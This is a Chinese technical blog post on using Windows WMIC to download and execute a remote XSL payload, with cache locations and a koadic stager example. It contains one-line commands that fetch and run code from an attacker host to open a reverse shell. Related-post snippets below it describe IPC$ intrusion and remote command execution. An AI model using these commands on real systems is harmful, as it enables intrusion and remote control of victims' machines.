Windows文件传输及执行—wmic

Windows WMIC 远程下载与执行payload
最新推荐文章于 2025-07-21 13:31:09 发布
原创 最新推荐文章于 2025-07-21 13:31:09 发布 · 2.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文探讨了Windows系统中WMIC命令用于远程下载文件和执行payload的原理和方法,包括依赖的WebClient服务及其启动要求。介绍了文件在不同情况下的缓存位置,并提供了koadic工具在目标主机上利用wmic创建反弹shell的示例。
部署运行你感兴趣的模型镜像

声明:本文介绍的内容仅用于学习和研究目的,请勿用做非法用途。
 取决于Windows系统的版本,通过HTTP下载的文件缓存位置为IE的本地缓存,在下面的路径之一:

  • C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
  • C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE<subdir>

使用指向WebDav服务器的UNC路径下载的文件将保存在WebDAV客户端本地缓存:

  • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

 在使用UNC路径下载payload时,需要WebClient 服务启动,如果没有启动,可在命令行前面加上pushd \\webdavserver & popd命令。

Wmic下载&执行

 Windows的wmic命令也支持远程下载文件并执行,基本命令格式如下:

wmic os get /format:"https://webserver/payload.xsl"

网络调用进程:wmic.exe,payload位置:IE local cache。
服务端使用koadic的wmic payload:

use stager/js/wmic

配置完服务端后,在目标主机cmd提示符下执行:

wmic os get /FORMAT:http://192.168.49.160:9996/pzzTv.xsl

在win7和win10测试,都可成功反弹shell:
在这里插入图片描述

您可能感兴趣的与本文相关的镜像

Stable-Diffusion-3.5

Stable-Diffusion-3.5

图片生成
Stable-Diffusion

Stable Diffusion 3.5 (SD 3.5) 是由 Stability AI 推出的新一代文本到图像生成模型,相比 3.0 版本,它提升了图像质量、运行速度和硬件效率

电脑Windows藏着的高手——WMIC命令
米可的博客!
11-08 721
WMICWindows 操作系统自带的一个命令行工具,用于管理和查询系统的硬件和软件信息。简单来说,WMIC 就像是一个强大的“系统探针”,可以帮助获取关于计算机的各种详细信息,比如硬件配置、操作系统状态、网络连接等。通过 WMIC,可以执行很多复杂的系统管理任务,无需编写复杂的脚本。
WMIC使用
渗透之路,攻防之间皆学问
11-15 7040
远程创建进程 如下,以administrator用户连接192.168.52.140,并在机器上创建一个进程执行ipconfig命令,将结果写入c:\result.txt文本文件中:(由于wmic执行远程命令没有回显,所以要将结果写入到txt中) wmic /node:192.168.52.140 /user:administrator /password:123.com process call create "cmd.exe /c ipconfig > c:\result.txt...
wmic的文件使用详解.doc
03-01
wmic,是一款命令行管理工具。使用wmic,我们不但可以管理本地计算机,而且还可以管理同一windows域内的所有远程计算机(需要必要的权限),而被管理的远程计算机不必事先安装分析、解释和执行从命令行接受的别名(Alias)的引擎…… 很多人制作的批处理或者脚本功能都是调用wmi实现的,它所具有的查看功能非常强大,尤其是安装了wmic的电脑可以连接到任何一台安装了wmi的电脑,被连接的电脑不需要安装wmic。比如我们要查看局域网内所有计算机的进程,监视对方计算机进程。
复制远程主机文件到本地(Windows系统)
u013884777的专栏
02-24 3616
1. 与远程主机建立IPC连接net use \\your_remote_ip\ipc$ "your_remote_password" /user:"your_remote_user_name"2. 开启远程主机C盘共享net use \\your_remote_ip\C$3. 复制远程主机文件到本地 copy \\your_remote_ip\C$\Apache2.2\logs\error.lo...
windows文件传输方法
weixin_30568715的博客
05-21 1931
通过堡垒机登录windows服务器,如何向windows服务器上传文件? Windows文件传输方法之一: 将需上传的文件打包压缩,利用邮箱附件功能发到另一邮箱,随后在服务器上登录邮箱下载Windows文件传输方法之二: 将数据上传至百度网盘或者微云等第三方存储服务,在服务器上登录即可下载Windows文件传输方法之三: 远程登录服务器时,通过本地磁盘映射功能,将本地磁盘映射到...
Windows远程cmd工具WMIcmd.exe
07-15
WMIcmd可以连接远程windows服务器,执行cmd命令。(要求远程端必须开启RPC服务,而且NET Framework必须为4.0以上)
Bypass | Windows中的文件下载方法
渗透之路,攻防之间皆学问
09-04 1948
有时候我们可以执行命令,我们想上线cs,但是主机上存在杀软,使用一般的方式都会被拦截,此时如何下载文件进行上线了?
Windows 远程控制(经典IPC$入侵、psexec类工具、利用WMI远程入侵、PsRemoting远程命令执行、使用wmic命令远程执行
LKmnbZ's Blog
01-14 7608
一、经典IPC$入侵 利用ipc$和默认共享入侵远程电脑的过程 1. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名" 一般通过扫描弱口令来得到管理员帐号和密码 2. C:\> copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去(这里的$是指admin用户的c:\winnt\system32...
关于内网常见端口漏洞和windowswmic
rlenew的博客
04-25 1672
WMIC是扩展WMI(Windows Management Instrumentation,Windows管理规范),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,比如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本语言,或者不掌握WMI名称空间的基本知识,要使用WMI管理系统是很困难的。WMIC改变了这种情况,为WMI名称空间提供了一个强.
Windows安全基础——Windows WMI详解
05-20 983
WMI(Windows Management Instrumentation, Windows管理规范)是Windows2000/XP管理系统的核心,属于管理数据和操作的基础模块。设计WMI的初衷是达到一种通用性,通过WMI操作系统、应用程序等来管理本地或者远程资源。它支持分布式组件对象模型(DCOM,DistributionModel)和Windows远程管理(WinRM),用户可通过WMI服务访问、配置、管理和监视Windows所有资源的功能。
WMIC调用工具
05-03
WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具) ,提供了从命令行接口和批命令脚本执行系统管理的支持。
wmic命令行介绍及使用.pdf
09-07
该文档详细记录了Windows Management InstrumentationCommand Line(Windows管理工具命令行)的基本使用,这对渗透测试进内网进行横向移动有很大帮助。
cmd脚本-bat批处理-文件工具-wmicVersion.zip
05-21
cmd脚本-bat批处理-文件工具-wmicVersion.zip
内网渗透信息收集-wmic命令自动收集。
weixin_42109829的博客
02-06 973
自动收集信息 为了简化操作,可以创建一个脚本, 在目标机器上完成流程、服务、用户账号、用户组、网时区等信息的查询工作。网上有很多类似的脚本,当然,我们也可以自己定制一个。在这里,笔者推荐一个利用WMIC收集月标机器信息的脚本。 WMIC ( Windows Management Instrumcntation Command-Line, Windows 管理工具命令行)是最有用的Windows命令行工具。在默认情况下,任何版本的Windows XP的低权限用户不能访问WMIC. Windows 7以上版本的
wmic的文件使用详解
Love Life Love Tech
11-07 1603
 2008-11-30 09:14:48  www.hackbase.com  来源:互联网   执行wmic”命令启动WMIC命令行环境。这个命令可以在XP或 .NET Server的标准命令行解释器(cmd.exe)、Telnet会话或“运行”对话框中执行。这些启动方法可以在本地使用,也可以通过.NET Server终端服务会话使用 ... 执行wmic”命令启动WMIC
windows比cmd更强大的 WMIC命令使用详解
热门推荐
第七宇林的博客
07-21 5万+
文章目录什么是wmic ?WMIC能做什么?WMIC命令使用帮助文档WMIC命令使用实例wmic的运行方式可以有两种法1.显示进程的详细信息2.停止、暂停和运行服务功能3.显示出BIOS信息4.停止进程的操作5.连接远程电脑6. BIOS - 基本输入/输出服务 (BIOS) 管理7.WMIC设置IP地址8.COMPUTERSYSTEM - 计算机系统管理9.CPU - CPU 管理10.DATA...
java wmic_强大的命令行工具wmic
weixin_34653651的博客
02-24 328
1.wmic=Microsoft Windows Management Instrumentation2. C:\WINDOWS\system32\wbem 下的东西,特别是.xsl格式化文件,实现wmic的格式化输出如wmic /output:c:\process.html process list /format:htable.xsl/format:textvaluelist.xsl/form...
(已解决)win11 ‘wmic‘ 不是内部或外部命令,也不是可运行的程序 或批处理文件。
最新发布
一天不写代码难受的博客
07-21 2171
win11 ‘wmic‘ 不是内部或外部命令,也不是可运行的程序 或批处理文件。
wmic windows
weixin_34025051的博客
04-21 140
http://www.ynpxrz.com/n614885c2025.aspx http://www.ynpxrz.com/n614883c2025.aspx http://www.ynpxrz.com/n614894c2025.aspx
windows通过局域网IP远程执行cmd命令
05-01
2. 引用[2]详细介绍了使用WMIC命令远程执行CMD命令的方法,特别是无回显执行,并将结果输出到文件。这应该是一个关键点,因为WMICWindows内置的工具,适合用于远程管理。 3. 引用[3]展示了如何通过CMD命令扫描...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值